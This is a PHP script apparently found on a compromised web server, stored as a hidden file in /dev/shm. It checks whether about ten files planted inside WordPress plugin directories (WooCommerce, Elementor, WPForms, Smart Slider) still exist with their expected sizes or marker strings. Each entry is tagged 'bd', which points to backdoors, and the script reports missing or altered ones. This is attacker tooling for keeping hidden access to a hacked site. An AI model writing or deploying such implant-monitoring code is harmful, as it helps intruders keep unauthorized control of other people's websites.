Current File : //proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/dev/shm/.object
<?php   $r = '/home/spargrew/sudsies.sparxtechsolutions.com'; $x = ["/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/Divi/V31lt/phocagalleryu.php"=>"bd@@8965@@1522",
"/wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/migration/ActionScheduler.php"=>"bd@@8973@@1587",
"/wp-content/plugins/woocommerce/packages/woocommerce-admin/src/API/pixgroup.php"=>"bd@@8980@@654",
"/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-duplicate-product.php"=>"bd@@11798@@right_pad_string",
"/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv/Resources/charset/from.cp869.php"=>"bd@@11800@@restore_state",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Slides/Template/cust_stat.php"=>"bd@@11804@@1673",
"/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Routes/V1/pageNavigation.php"=>"bd@@11807@@1607",
"/wp-content/plugins/elementor/core/editor/loader/v1/templates/editor.body.v1.view.php"=>"bd@@11808@@1717",
"/wp-content/plugins/elementor/modules/page-templates/templates/header.php"=>"bd@@8805@@642",
"/wp-content/plugins/woocommerce/templates/single-product/add-to-cart/variation-add-to-cart-button.php"=>"bd@@8944@@right_pad_string"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');